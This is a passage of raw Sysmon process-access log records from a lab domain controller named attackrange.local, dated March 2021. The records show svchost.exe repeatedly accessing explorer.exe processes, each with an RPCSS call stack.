16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243900Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243899Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243898Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243897Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243896Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243895Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243894Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243893Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243892Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243891Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243890Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243889Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243888Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243887Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243886Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243885Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243884Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243883Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243882Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243881Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243880Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243879Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243878Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243877Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243876Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243875Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243874Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243873Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243872Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243871Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243870Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243869Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243868Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 